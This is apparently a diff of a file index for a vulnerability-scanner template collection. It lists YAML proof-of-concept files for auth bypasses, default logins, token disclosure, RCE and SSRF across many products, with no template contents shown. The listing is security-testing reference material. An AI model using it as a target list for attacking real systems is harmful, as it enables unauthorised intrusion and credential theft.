./poc/auth/plainview-protect-passwords-79caa4f8ea1fa3260f686401ac5493b5.yaml 
@@ -3489,10 +3459,9 @@ ./poc/auth/pmpro-register-helper.yaml ./poc/auth/poc-yaml-F5-BIG-IP-login-bypass-CVE-2022-1388.yaml ./poc/auth/poc-yaml-otter-default-password.yaml -./poc/auth/polycom-login-9625.yaml ./poc/auth/polycom-login-9626.yaml +./poc/auth/polycom-login-9627.yaml ./poc/auth/polycom-login.yaml -./poc/auth/possible-AEM-secrets.yaml ./poc/auth/postgres-default-logins.yaml ./poc/auth/postgresql-empty-password.yaml ./poc/auth/postgresql-weak-password.yaml @@ -3521,8 +3490,8 @@ ./poc/auth/pure-storage-login-9725.yaml ./poc/auth/pure-storage-login.yaml ./poc/auth/putty-private-key-disclosure-9729.yaml +./poc/auth/putty-private-key-disclosure-9730.yaml ./poc/auth/putty-private-key-disclosure-9731.yaml -./poc/auth/putty-private-key-disclosure-9732.yaml ./poc/auth/putty-private-key-disclosure.yaml ./poc/auth/putty-user-keyfile.yaml ./poc/auth/pypi-token.yaml @@ -3550,16 +3519,18 @@ ./poc/auth/rabbitmq-missing-auth.yaml ./poc/auth/racksnet-login.yaml ./poc/auth/rails-secret-token-disclosure-9808.yaml -./poc/auth/rails-secret-token-disclosure-9809.yaml +./poc/auth/rails-secret-token-disclosure-9810.yaml ./poc/auth/rails-secret-token-disclosure.yaml ./poc/auth/rails-secret-token.yaml ./poc/auth/rainloop-default-login-9811.yaml ./poc/auth/rainloop-default-login-9812.yaml ./poc/auth/rainloop-default-login-9813.yaml +./poc/auth/rainloop-default-login.yaml ./poc/auth/rancher-default-login-9814.yaml ./poc/auth/rancher-default-login-9815.yaml ./poc/auth/rancher-default-login-9816.yaml ./poc/auth/rancher-default-password.yaml +./poc/auth/ranger-default-login-9827.yaml ./poc/auth/ranger-default-login-9828.yaml ./poc/auth/raw-cookie-reuse.yaml ./poc/auth/real-cookie-banner-1dba91bdd70cfd02be29db46dcf540b8.yaml 
@@ -3629,13 +3600,13 @@ ./poc/auth/robomongo-credential.yaml ./poc/auth/rockmongo-default-credentials-9896.yaml ./poc/auth/rockmongo-default-credentials.yaml +./poc/auth/rockmongo-default-login-9897.yaml ./poc/auth/rockmongo-default-login-9898.yaml ./poc/auth/rockmongo-default-login-9899.yaml ./poc/auth/rockmongo-default-login-9900.yaml ./poc/auth/rockmongo-default-password.yaml ./poc/auth/rockmongo-default-password.yml -./poc/auth/routeros-login-9908.yaml -./poc/auth/routeros-login.yaml +./poc/auth/routeros-login-9909.yaml ./poc/auth/rseenet-default-login-9913.yaml ./poc/auth/rseenet-default-login-9914.yaml ./poc/auth/rseenet-default-login-9915.yaml @@ -3647,7 +3618,6 @@ ./poc/auth/ruijie-eg-and-nbr-guest-auth-guestisup-rce.yaml ./poc/auth/ruijie-eg-and-nbr-local-auth-php-fileread.yaml ./poc/auth/ruijie-eg-and-nbr-login-php-infoleak-to-rce.yaml -./poc/auth/ruijie-eg-password-leak-9922.yaml ./poc/auth/ruijie-eg-password-leak-9923.yaml ./poc/auth/ruijie-eg-password-leak-9924.yaml ./poc/auth/ruijie-eg-password-leak.yaml @@ -3665,8 +3635,8 @@ ./poc/auth/s3-bucket-key.yaml ./poc/auth/safenet-authentication-panel.yaml ./poc/auth/saferoads-vms-login-9970.yaml -./poc/auth/saferoads-vms-login-9971.yaml ./poc/auth/saferoads-vms-login-9972.yaml +./poc/auth/saferoads-vms-login-9973.yaml ./poc/auth/saferoads-vms-login-9974.yaml ./poc/auth/saferoads-vms-login.yaml ./poc/auth/sagem-2604-password-disclosure.yaml @@ -3680,6 +3650,7 @@ ./poc/auth/samsung-wlan-default-login-10015.yaml ./poc/auth/samsung-wlan-default-login-10016.yaml ./poc/auth/samsung-wlan-default-login-10017.yaml +./poc/auth/samsung-wlan-default-login-10018.yaml ./poc/auth/sangfor-ad-login-rce.yaml ./poc/auth/sangfor-behavior-management-or-identity-authentication-system.yaml ./poc/auth/sangfor-edr-arbitrary-admin-login.yaml 
@@ -3687,19 +3658,17 @@ ./poc/auth/sangfor-edr-auth-bypass-10022.yaml ./poc/auth/sangfor-edr-auth-bypass-10023.yaml ./poc/auth/sangfor-edr-auth-bypass-10024.yaml -./poc/auth/sangfor-edr-auth-bypass.yaml ./poc/auth/sangfor-report-rep-login-rce.yaml ./poc/auth/sangfor-vpn-supersession-rce.yaml ./poc/auth/sas-login-panel.yaml ./poc/auth/sauce-access-token.yaml ./poc/auth/sauter-login-10088.yaml -./poc/auth/sauter-login-10089.yaml ./poc/auth/sauter-login-10090.yaml +./poc/auth/sauter-login-10091.yaml ./poc/auth/sauter-login.yaml ./poc/auth/schneider-link150-login.yaml ./poc/auth/scriptcase-prod-login.yaml ./poc/auth/seagate-nas-login.yaml -./poc/auth/seats-login-10104.yaml ./poc/auth/seats-login-10105.yaml ./poc/auth/seats-login-10106.yaml ./poc/auth/seats-login-10107.yaml @@ -3748,9 +3717,9 @@ ./poc/auth/sequoiadb-default-login-10150.yaml ./poc/auth/sequoiadb-default-login-10152.yaml ./poc/auth/sequoiadb-login.yaml +./poc/auth/server-backup-login-10153.yaml ./poc/auth/server-backup-login-10154.yaml ./poc/auth/server-backup-login-10155.yaml -./poc/auth/server-backup-login-10156.yaml ./poc/auth/server-backup-login.yaml ./poc/auth/server-backup-manager-se-login-detect.yaml ./poc/auth/server-private-keys-1.yaml @@ -3776,13 +3745,12 @@ ./poc/auth/server-private-keys-9.yaml ./poc/auth/server-private-keys.yaml ./poc/auth/service-account-credentials.yaml +./poc/auth/service-pwd-10176.yaml ./poc/auth/service-pwd-10177.yaml ./poc/auth/service-pwd-10178.yaml ./poc/auth/service-pwd-10179.yaml -./poc/auth/service-pwd.yaml ./poc/auth/servicedesk-login-panel-1.yaml ./poc/auth/servicedesk-login-panel-10171.yaml -./poc/auth/servicedesk-login-panel-10172.yaml ./poc/auth/servicedesk-login-panel-10173.yaml ./poc/auth/servicedesk-login-panel-2.yaml ./poc/auth/servicedesk-login-panel.yaml 
@@ -3810,12 +3778,11 @@ ./poc/auth/shikongzhiyou-erp-login-fileread.yaml ./poc/auth/shikongzhiyou-login_fileread.yaml ./poc/auth/shiro-124-rememberme.yaml -./poc/auth/shopify-custom-token-10198.yaml +./poc/auth/shopify-custom-token(1).yaml ./poc/auth/shopify-custom-token-11860.yaml ./poc/auth/shopify-custom-token.yaml ./poc/auth/shopify-legacy-private-app-token.yaml ./poc/auth/shopify-private-token-10199.yaml -./poc/auth/shopify-private-token-11861.yaml ./poc/auth/shopify-private-token.yaml ./poc/auth/shopify-shared-secret-11862.yaml ./poc/auth/shopify-shared-secret.yaml @@ -3824,6 +3791,8 @@ ./poc/auth/shoppable-token-10206.yaml ./poc/auth/shoppable-token-10207.yaml ./poc/auth/shoppable-token-10208.yaml +./poc/auth/shoppable-token-10209.yaml +./poc/auth/shoppable-token.yaml ./poc/auth/showdoc-default-login-10219.yaml ./poc/auth/showdoc-default-login-10220.yaml ./poc/auth/showdoc-default-login-10221.yaml @@ -3863,10 +3832,10 @@ ./poc/auth/sitecore-login.yaml ./poc/auth/sitefinity-login-10295.yaml ./poc/auth/sitefinity-login-10296.yaml -./poc/auth/sitefinity-login-10298.yaml +./poc/auth/sitefinity-login-10297.yaml ./poc/auth/sitefinity-login-10299.yaml ./poc/auth/sitefinity-login.yaml -./poc/auth/siteomat-login-10300.yaml +./poc/auth/siteomat-login-10301.yaml ./poc/auth/siteomat-login-10302.yaml ./poc/auth/siteomat-login-10303.yaml ./poc/auth/siteomat-login.yaml @@ -3877,6 +3846,7 @@ ./poc/auth/slack-api-token.yaml ./poc/auth/slack-bot-token-10310.yaml ./poc/auth/slack-bot-token-10311.yaml +./poc/auth/slack-bot-token-10312.yaml ./poc/auth/slack-user-token-10314.yaml ./poc/auth/slack-webhook-token-10315.yaml ./poc/auth/slocum-login-10317.yaml 
@@ -3903,22 +3873,20 @@ ./poc/auth/social-login-lite-for-woocommerce.yaml ./poc/auth/social-login-wp-e99eebfad9065c45993831ff9d87e487.yaml ./poc/auth/social-login-wp.yaml -./poc/auth/solar-log-authbypass-10352.yaml ./poc/auth/solar-log-authbypass-10353.yaml +./poc/auth/solar-log-authbypass.yaml ./poc/auth/solarwinds-default-login-1.yaml ./poc/auth/solarwinds-default-login-10354.yaml -./poc/auth/solarwinds-default-login-10355.yaml ./poc/auth/solarwinds-default-login-10356.yaml ./poc/auth/solarwinds-default-login-2.yaml +./poc/auth/somfy-login-10371.yaml ./poc/auth/somfy-login-10372.yaml -./poc/auth/somfy-login-10373.yaml ./poc/auth/somfy-login.yaml ./poc/auth/sonarqube-cred.yaml ./poc/auth/sonarqube-cve-2020-27986-unauth.yml ./poc/auth/sonarqube-login-10374.yaml ./poc/auth/sonarqube-login-10375.yaml ./poc/auth/sonarqube-login.yaml -./poc/auth/sonarqube-token-10380.yaml ./poc/auth/sonarqube-token-10381.yaml ./poc/auth/sonarqube-token-10382.yaml ./poc/auth/sonic-wall-login.yaml @@ -3930,6 +3898,7 @@ ./poc/auth/spark-api-unauth.yml ./poc/auth/spark-unauth.yaml ./poc/auth/spark-webui-unauth-10400.yaml +./poc/auth/spark-webui-unauth-10401.yaml ./poc/auth/spark-webui-unauth-10402.yaml ./poc/auth/spark-webui-unauth.yaml ./poc/auth/spark-webui-unauth.yml @@ -3939,14 +3908,14 @@ ./poc/auth/spectracom-default-login-10406.yaml ./poc/auth/spectracom-default-password.yaml ./poc/auth/sphider-login-1.yaml -./poc/auth/sphider-login-10407.yaml ./poc/auth/sphider-login-10408.yaml +./poc/auth/sphider-login-10409.yaml ./poc/auth/sphider-login-10410.yaml ./poc/auth/sphider-login-2.yaml ./poc/auth/sphider-login-3.yaml ./poc/auth/sphider-login.yaml ./poc/auth/splunk-enterprise-login-panel.yaml -./poc/auth/splunk-enterprise-login-panel.yml +./poc/auth/splunk-login-10416.yaml ./poc/auth/splunk-login-10417.yaml ./poc/auth/splunk-login-10418.yaml ./poc/auth/splunk-login-10419.yaml 
@@ -3956,7 +3925,7 @@ ./poc/auth/springboot-actuator-unauth.yaml ./poc/auth/springboot-env-unauth.yaml ./poc/auth/springboot-env-unauth.yml -./poc/auth/square-access-token(1).yaml +./poc/auth/square-access-token-11867.yaml ./poc/auth/square-access-token.yaml ./poc/auth/square-oauth-secret-11868.yaml ./poc/auth/square-oauth-secret.yaml @@ -3984,35 +3953,35 @@ ./poc/auth/stackstorm-default-login.yaml ./poc/auth/stem-audio-table-private-keys-10533.yaml ./poc/auth/stem-audio-table-private-keys-10534.yaml -./poc/auth/stem-audio-table-private-keys-10536.yaml +./poc/auth/stem-audio-table-private-keys-10535.yaml ./poc/auth/stem-audio-table-private-keys.yaml ./poc/auth/steve-login-panel.yaml ./poc/auth/storm-unauthorized-access.yaml -./poc/auth/stripe-api-key-11869.yaml +./poc/auth/stripe-api-key(1).yaml ./poc/auth/stripe-api-key.yaml ./poc/auth/stripe-restricted-key-10553.yaml ./poc/auth/stripe-restricted-key-10554.yaml +./poc/auth/stripe-restricted-key.yaml ./poc/auth/stripe-secret-key-10556.yaml ./poc/auth/stripe-secret-key-10557.yaml ./poc/auth/stripe-secret-key-10558.yaml ./poc/auth/structurizr-default-login.yaml ./poc/auth/submitty-login-10567.yaml -./poc/auth/submitty-login-10568.yaml ./poc/auth/submitty-login.yaml ./poc/auth/subrion-login.yaml ./poc/auth/sunlogin.yaml ./poc/auth/sunlogin_RCE_CNVD-2022-10270.yaml ./poc/auth/supermicro-default-login-10572.yaml +./poc/auth/supermicro-default-login.yaml ./poc/auth/superset-default-login-10573.yaml ./poc/auth/superset-default-login-10574.yaml ./poc/auth/superset-default-login.yaml ./poc/auth/superset-login.yaml -./poc/auth/symantec-dlp-login-10596.yaml ./poc/auth/symantec-dlp-login-10597.yaml ./poc/auth/symantec-dlp-login-10598.yaml ./poc/auth/symantec-dlp-login.yaml +./poc/auth/symantec-epm-login-10599.yaml ./poc/auth/symantec-epm-login-10600.yaml -./poc/auth/symantec-epm-login-10601.yaml ./poc/auth/symantec-epm-login-10602.yaml ./poc/auth/symantec-epm-login.yaml ./poc/auth/symantec-ewep-login-10604.yaml 
@@ -4022,7 +3991,7 @@ ./poc/auth/szhe-default-login-10635.yaml ./poc/auth/szhe-default-login-10636.yaml ./poc/auth/szhe-default-login-10637.yaml -./poc/auth/szhe-default-login.yaml +./poc/auth/szhe-default-login-10638.yaml ./poc/auth/szhe-default-password-10639.yaml ./poc/auth/szhe-default-password-10640.yaml ./poc/auth/szhe-default-password.yaml @@ -4030,6 +3999,7 @@ ./poc/auth/teamcity-login-panel.yaml ./poc/auth/teamtalk-login.yaml ./poc/auth/telecom-gateway-default-login-10686.yaml +./poc/auth/telecom-gateway-default-login.yaml ./poc/auth/telecom-gateway-default-password.yaml ./poc/auth/telecom-gateway-default-password.yml ./poc/auth/telegram-token.yaml @@ -4053,8 +4023,8 @@ ./poc/auth/threatq-login.yaml ./poc/auth/thruk-login.yaml ./poc/auth/tidb-native-password.yaml +./poc/auth/tidb-unauth-10770.yaml ./poc/auth/tidb-unauth-10771.yaml -./poc/auth/tidb-unauth-10772.yaml ./poc/auth/tidb-unauth.yaml ./poc/auth/timekeeper-default-login.yaml ./poc/auth/tingsboard-default-login.yaml @@ -4066,6 +4036,7 @@ ./poc/auth/tomcat-default-login-10789.yaml ./poc/auth/tomcat-default-login-10790.yaml ./poc/auth/tomcat-default-login-10791.yaml +./poc/auth/tomcat-default-login.yaml ./poc/auth/tomcat-examples-login.yaml ./poc/auth/tomcat-manager-default-creds.yaml ./poc/auth/tongda-meeting-unauthorized-access.yml @@ -4113,8 +4084,9 @@ ./poc/auth/tyan-rmm-bmc-default-login.yaml ./poc/auth/typo3-login.yaml ./poc/auth/ucmdb-default-login-10868.yaml -./poc/auth/ucmdb-default-login-10869.yaml ./poc/auth/ucmdb-default-login-10870.yaml +./poc/auth/ucmdb-default-login-10871.yaml +./poc/auth/ucmdb-default-login.yaml ./poc/auth/uk-cookie-consent-0bbba77520762097a09ab36a8d9ac90f.yaml ./poc/auth/uk-cookie-consent.yaml ./poc/auth/uk-cookie-d24507ac932285b70361a7e9dd308165.yaml 
@@ -4125,11 +4097,10 @@ ./poc/auth/unauth-ftp-10939.yaml ./poc/auth/unauth-ftp-10940.yaml ./poc/auth/unauth-ftp-10941.yaml -./poc/auth/unauth-ftp-10942.yaml ./poc/auth/unauth-ftp.yaml ./poc/auth/unauth-hoteldruid-panel-1.yaml -./poc/auth/unauth-hoteldruid-panel-10943.yaml ./poc/auth/unauth-hoteldruid-panel-2.yaml +./poc/auth/unauth-hoteldruid-panel.yaml ./poc/auth/unauth-kubecost.yaml ./poc/auth/unauth-ldap-account-manager.yaml ./poc/auth/unauth-mautic-upgrade.yaml 
@@ -4149,33 +4120,33 @@ ./poc/auth/unauth-spark-api-10963.yaml ./poc/auth/unauth-spark-api-10964.yaml ./poc/auth/unauth-spark-api-10965.yaml -./poc/auth/unauth-spark-api.yaml ./poc/auth/unauth-temporal-web-ui.yaml ./poc/auth/unauth-wavink-panel-10966.yaml -./poc/auth/unauth-xproxy-dashboard-10968.yaml +./poc/auth/unauth-wavink-panel-10967.yaml +./poc/auth/unauth-xproxy-dashboard-10969.yaml ./poc/auth/unauth-xproxy-dashboard.yaml ./poc/auth/unauth-zwave-mqtt.yaml ./poc/auth/unauthen-elastic.yaml ./poc/auth/unauthen-kibana.yaml +./poc/auth/unauthenticated-airflow-10884.yaml ./poc/auth/unauthenticated-airflow-10885.yaml -./poc/auth/unauthenticated-airflow-10886.yaml ./poc/auth/unauthenticated-airflow-10887.yaml ./poc/auth/unauthenticated-airflow.yaml ./poc/auth/unauthenticated-alert-manager-10888.yaml ./poc/auth/unauthenticated-alert-manager-10889.yaml ./poc/auth/unauthenticated-alert-manager-10890.yaml ./poc/auth/unauthenticated-alert-manager-10891.yaml -./poc/auth/unauthenticated-alert-manager-10892.yaml ./poc/auth/unauthenticated-frp-10893.yaml ./poc/auth/unauthenticated-frp-10894.yaml +./poc/auth/unauthenticated-frp-10895.yaml ./poc/auth/unauthenticated-frp-10896.yaml -./poc/auth/unauthenticated-frp-10897.yaml ./poc/auth/unauthenticated-frp.yaml ./poc/auth/unauthenticated-glances-10898.yaml ./poc/auth/unauthenticated-glances-10899.yaml ./poc/auth/unauthenticated-glowroot-10900.yaml ./poc/auth/unauthenticated-glowroot-10901.yaml ./poc/auth/unauthenticated-glowroot-10902.yaml +./poc/auth/unauthenticated-influxdb-10903.yaml ./poc/auth/unauthenticated-influxdb.yaml ./poc/auth/unauthenticated-jenkin-dashboard.yaml ./poc/auth/unauthenticated-jenkins.yaml 
@@ -4188,10 +4159,11 @@ ./poc/auth/unauthenticated-mongo-express-10910.yaml ./poc/auth/unauthenticated-mongo-express-10911.yaml ./poc/auth/unauthenticated-mongo-express-2.yaml +./poc/auth/unauthenticated-mongo-express.yaml ./poc/auth/unauthenticated-nacos-access-1.yaml +./poc/auth/unauthenticated-nacos-access-10912.yaml ./poc/auth/unauthenticated-nacos-access-10913.yaml ./poc/auth/unauthenticated-nacos-access-10914.yaml -./poc/auth/unauthenticated-nacos-access-10915.yaml ./poc/auth/unauthenticated-nacos-access-2.yaml ./poc/auth/unauthenticated-nacos-access.yaml ./poc/auth/unauthenticated-netdata-10916.yaml @@ -4200,11 +4172,12 @@ ./poc/auth/unauthenticated-nginx-dashboard.yaml ./poc/auth/unauthenticated-popup-upload-10919.yaml ./poc/auth/unauthenticated-popup-upload-10920.yaml -./poc/auth/unauthenticated-popup-upload-10922.yaml +./poc/auth/unauthenticated-popup-upload-10921.yaml ./poc/auth/unauthenticated-popup-upload-10923.yaml -./poc/auth/unauthenticated-prtg-10924.yaml +./poc/auth/unauthenticated-popup-upload.yaml ./poc/auth/unauthenticated-prtg-10925.yaml ./poc/auth/unauthenticated-prtg-10926.yaml +./poc/auth/unauthenticated-prtg-10927.yaml ./poc/auth/unauthenticated-prtg-10928.yaml ./poc/auth/unauthenticated-qax-vpn-access.yaml ./poc/auth/unauthenticated-tensorboard-10929.yaml 
@@ -4214,24 +4187,23 @@ ./poc/auth/unauthenticated-varnish-cache-purge-10934.yaml ./poc/auth/unauthenticated-varnish-cache-purge.yaml ./poc/auth/unauthenticated-zipkin-10936.yaml -./poc/auth/unauthenticated-zipkin.yaml ./poc/auth/unauthenticated-zippkin-10938.yaml ./poc/auth/unauthenticated-zippkin.yaml ./poc/auth/unauthorized-access-to-secret.yaml ./poc/auth/unauthorized-access.yaml ./poc/auth/unauthorized-brother-access-detect.yaml -./poc/auth/unauthorized-h3csecparh-login-10948.yaml ./poc/auth/unauthorized-h3csecparh-login-10949.yaml +./poc/auth/unauthorized-h3csecparh-login.yaml ./poc/auth/unauthorized-hp-officepro-printer-10950.yaml ./poc/auth/unauthorized-hp-officepro-printer.yaml +./poc/auth/unauthorized-hp-printer-10951.yaml ./poc/auth/unauthorized-hp-printer-10952.yaml ./poc/auth/unauthorized-hp-printer-10954.yaml ./poc/auth/unauthorized-hp-printer.yaml ./poc/auth/unauthorized-plastic-scm-10955.yaml ./poc/auth/unauthorized-plastic-scm-10956.yaml -./poc/auth/unauthorized-plastic-scm-10957.yaml ./poc/auth/unauthorized-printer-hp.yaml -./poc/auth/unauthorized-puppet-node-manager-detect-10959.yaml +./poc/auth/unauthorized-puppet-node-manager-detect-10958.yaml ./poc/auth/unauthorized-puppet-node-manager-detect.yaml ./poc/auth/unencrypted-bigip-ltm-cookie-10972.yaml ./poc/auth/unencrypted-bigip-ltm-cookie-10973.yaml 
@@ -4258,16 +4230,16 @@ ./poc/auth/versa-director-login.yaml ./poc/auth/versa-flexvnf-ui-default-login.yaml ./poc/auth/vidyo-default-login-11008.yaml -./poc/auth/vidyo-default-login-11009.yaml -./poc/auth/vidyo-default-login.yaml +./poc/auth/vidyo-default-login-11010.yaml ./poc/auth/vidyo-login.yaml +./poc/auth/vigor-login-11020.yaml ./poc/auth/vigor-login-11021.yaml ./poc/auth/vigor-login-11022.yaml -./poc/auth/vigor-login-11023.yaml ./poc/auth/vigor-login-page-2000-series.yaml ./poc/auth/vigor-login-page.yaml ./poc/auth/vigor-login.yaml ./poc/auth/visionhub-default-credentials.yaml +./poc/auth/visionhub-default-login-11026.yaml ./poc/auth/visionhub-default-login-11027.yaml ./poc/auth/visionhub-default-login-11028.yaml ./poc/auth/visionhub-default-login-11029.yaml @@ -4277,8 +4249,8 @@ ./poc/auth/vmware-hcx-login.yaml ./poc/auth/vmware-nsx-login.yaml ./poc/auth/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml +./poc/auth/vpms-auth-bypass-11066.yaml ./poc/auth/vpms-auth-bypass-11067.yaml -./poc/auth/vpms-auth-bypass-11068.yaml ./poc/auth/vpms-auth-bypass-11069.yaml ./poc/auth/vpms-auth-bypass.yaml ./poc/auth/vrealize-loginsight-panel.yaml @@ -4287,8 +4259,8 @@ ./poc/auth/wanhuOA-default-login.yaml ./poc/auth/wanhuOA-sqli-outMailLoginCheck.yaml ./poc/auth/watchguard-credentials-disclosure-11105.yaml -./poc/auth/watchguard-credentials-disclosure-11106.yaml ./poc/auth/watchguard-credentials-disclosure-11107.yaml +./poc/auth/watchguard-credentials-disclosure.yaml ./poc/auth/wayos-ac-centralized-management-system-default-weak-password.yaml ./poc/auth/wayos-default-password.yaml ./poc/auth/wazuh-default-login.yaml @@ -4304,7 +4276,6 @@ ./poc/auth/web3-authentication.yaml ./poc/auth/weblogic-login-11150.yaml ./poc/auth/weblogic-login.yaml -./poc/auth/weblogic-weak-login-11154.yaml ./poc/auth/weblogic-weak-login-11155.yaml ./poc/auth/weblogic-weak-login-11156.yaml ./poc/auth/webmethod-integration-default-login.yaml 
@@ -4322,7 +4293,6 @@ ./poc/auth/wifisky-default-login-11203.yaml ./poc/auth/wifisky-default-login-11204.yaml ./poc/auth/wifisky-default-login.yaml -./poc/auth/wifisky-default-password-11205.yaml ./poc/auth/wifisky-default-password-11206.yaml ./poc/auth/wifisky-default-password-cnvd-2021-39012.yml ./poc/auth/wifisky-default-password.yaml @@ -4339,7 +4309,6 @@ ./poc/auth/wordpress-infinitewp-auth-bypass-11285.yaml ./poc/auth/wordpress-infinitewp-auth-bypass-11286.yaml ./poc/auth/wordpress-infinitewp-auth-bypass-11287.yaml -./poc/auth/wordpress-infinitewp-auth-bypass-11288.yaml ./poc/auth/wordpress-infinitewp-auth-bypass-11289.yaml ./poc/auth/wordpress-infinitewp-auth-bypass.yaml ./poc/auth/wordpress-login-11293.yaml @@ -4356,7 +4325,7 @@ ./poc/auth/wordpress-updraftplus-pem-key.yaml ./poc/auth/wordpress-weak-credentials-11334.yaml ./poc/auth/wordpress-weak-credentials-11335.yaml -./poc/auth/wordpress-weak-credentials-11337.yaml +./poc/auth/wordpress-weak-credentials-11336.yaml ./poc/auth/wordpress-weak-credentials.yaml ./poc/auth/wp-activate-register-redirect.yaml ./poc/auth/wp-cookie-user-info-d2666c85e1e86cfe042cf280f363f5ef.yaml @@ -4441,8 +4410,8 @@ ./poc/auth/wpconfig-aws-keys-1.yaml ./poc/auth/wpconfig-aws-keys-2.yaml ./poc/auth/wpconfig-aws-keys.yaml +./poc/auth/wpdm-cache-session-11436.yaml ./poc/auth/wpdm-cache-session-11437.yaml -./poc/auth/wpdm-cache-session-11438.yaml ./poc/auth/wpdm-cache-session-11439.yaml ./poc/auth/wpdm-cache-session.yaml ./poc/auth/wpmudev-pub-keys-11504.yaml 
@@ -4481,20 +4450,19 @@ ./poc/auth/wso2-default-login-11640.yaml ./poc/auth/wso2-default-login-11641.yaml ./poc/auth/wso2-default-login-11642.yaml -./poc/auth/wso2-default-login.yaml ./poc/auth/wso2-default-password.yaml ./poc/auth/xenforo-login-11670.yaml ./poc/auth/xenforo-login-11671.yaml ./poc/auth/xenforo-login-11672.yaml -./poc/auth/xenforo-login-11674.yaml ./poc/auth/xenforo-login.yaml +./poc/auth/xenmobile-login-11675.yaml ./poc/auth/xenmobile-login-11676.yaml -./poc/auth/xenmobile-login-11677.yaml ./poc/auth/xenmobile-login.yaml ./poc/auth/xerox-workcentre7-default-password.yaml ./poc/auth/xerox7-default-login-11678.yaml ./poc/auth/xerox7-default-login-11679.yaml ./poc/auth/xerox7-default-login-11680.yaml +./poc/auth/xerox7-default-login.yaml ./poc/auth/xerox7-default-password.yaml ./poc/auth/xiaomi-wireless-router-login.yaml ./poc/auth/xibocms-login.yaml @@ -4503,9 +4471,9 @@ ./poc/auth/xvr-login-11702.yaml ./poc/auth/xvr-login-11703.yaml ./poc/auth/xvr-login-11704.yaml +./poc/auth/xvr-login-11705.yaml ./poc/auth/xvr-login-11706.yaml ./poc/auth/xvr-login.yaml -./poc/auth/xxljob-default-login-11709.yaml ./poc/auth/xxljob-default-login-11710.yaml ./poc/auth/xxljob-default-login-11711.yaml ./poc/auth/xxljob-default-login-11712.yaml 
@@ -4552,25 +4520,28 @@ ./poc/auth/zabbix-default-password.yml ./poc/auth/zabbix-server-login-11767.yaml ./poc/auth/zabbix-server-login-11768.yaml +./poc/auth/zabbix-server-login-11769.yaml ./poc/auth/zabbix-server-login-11770.yaml ./poc/auth/zabbix-server-login.yaml ./poc/auth/zapier-webhook-token-11771.yaml ./poc/auth/zenario-login-panel-11776.yaml ./poc/auth/zenario-login-panel.yaml ./poc/auth/zentao-zentaosid-auth-bypass.yaml +./poc/auth/zeroshell-login-11788.yaml ./poc/auth/zeroshell-login-11789.yaml -./poc/auth/zeroshell-login-11790.yaml ./poc/auth/zeroshell-login.yaml -./poc/auth/zhiyuan-oa-session-leak-11801.yaml +./poc/auth/zhiyuan-oa-session-leak-11802.yaml ./poc/auth/zhiyuan-oa-session-leak-11803.yaml ./poc/auth/zhiyuan-oa-session-leak-11804.yaml ./poc/auth/zhiyuan-oa-session-leak-11805.yaml +./poc/auth/zhiyuan-oa-session-leak.yaml +./poc/auth/zhiyuan-oa-unauthorized-11806.yaml ./poc/auth/zhiyuan-oa-unauthorized-11807.yaml -./poc/auth/zhiyuan-oa-unauthorized-11808.yaml ./poc/auth/zhiyuan-oa-unauthorized.yaml ./poc/auth/zhiyuan-session-leakage.yaml ./poc/auth/zimbra-preauth-ssrf-11809.yaml ./poc/auth/zimbra-preauth-ssrf-11810.yaml +./poc/auth/zimbra-preauth-ssrf.yaml ./poc/auth/zimbra-web-login.yaml ./poc/auth/zipkin-unauth-11823.yaml ./poc/auth/zipkin-unauth.yaml @@ -4583,8 +4554,8 @@ ./poc/auth/zmanda-default-login-11827.yaml ./poc/auth/zmanda-default-login-11828.yaml ./poc/auth/zms-auth-bypass-11829.yaml +./poc/auth/zms-auth-bypass-11830.yaml ./poc/auth/zms-auth-bypass-11831.yaml -./poc/auth/zms-auth-bypass-11832.yaml ./poc/auth/zms-auth-bypass.yaml ./poc/auth/zoho-webhook-token-11835.yaml ./poc/auth/zoho-webhook-token-11836.yaml 
@@ -4748,9 +4719,8 @@ ./poc/aws/amazon-auto-links-plugin.yaml ./poc/aws/amazon-auto-links.yaml ./poc/aws/amazon-docker-config-279.yaml -./poc/aws/amazon-docker-config-280.yaml -./poc/aws/amazon-docker-config-disclosure-278.yaml ./poc/aws/amazon-docker-config-disclosure.yaml +./poc/aws/amazon-docker-config.yaml ./poc/aws/amazon-ec2-ssrf.yaml ./poc/aws/amazon-einzeltitellinks-6c575ce7bdb8499dce4ce35ed88e8474.yaml ./poc/aws/amazon-einzeltitellinks.yaml @@ -4788,20 +4758,19 @@ ./poc/aws/arconix-faq-03fd7fbcfd3967eecec2212a351e2737.yaml ./poc/aws/arconix-shortcodes-03fd7fbcfd3967eecec2212a351e2737.yaml ./poc/aws/armember-membership-76d089af6b78d98ec2c18a1732ae08c5.yaml -./poc/aws/aws-access-id-618.yaml ./poc/aws/aws-access-id-619.yaml -./poc/aws/aws-access-id-620.yaml ./poc/aws/aws-access-id.yaml ./poc/aws/aws-access-key-value-622.yaml ./poc/aws/aws-access-key-value-623.yaml +./poc/aws/aws-access-key-value-624.yaml ./poc/aws/aws-access-key-value-625.yaml ./poc/aws/aws-access-key-value.yaml ./poc/aws/aws-access-key.yaml ./poc/aws/aws-app-enum.yaml ./poc/aws/aws-bucket-service-626.yaml ./poc/aws/aws-bucket-service-627.yaml -./poc/aws/aws-bucket-service-628.yaml ./poc/aws/aws-bucket-service-629.yaml +./poc/aws/aws-bucket-service.yaml ./poc/aws/aws-bucket-takeover-630.yaml ./poc/aws/aws-bucket-takeover-631.yaml ./poc/aws/aws-bucket-takeover.yaml @@ -4809,11 +4778,9 @@ ./poc/aws/aws-cdn-by-wpadmin.yaml ./poc/aws/aws-cloudfront-service-633.yaml ./poc/aws/aws-cloudfront-service-634.yaml -./poc/aws/aws-cloudfront-service-635.yaml ./poc/aws/aws-code-env.yaml ./poc/aws/aws-cognito-636.yaml ./poc/aws/aws-cognito-637.yaml -./poc/aws/aws-cognito-638.yaml ./poc/aws/aws-cognito.yaml ./poc/aws/aws-config-not-enabled.yaml ./poc/aws/aws-ec2-autoscale.yaml 
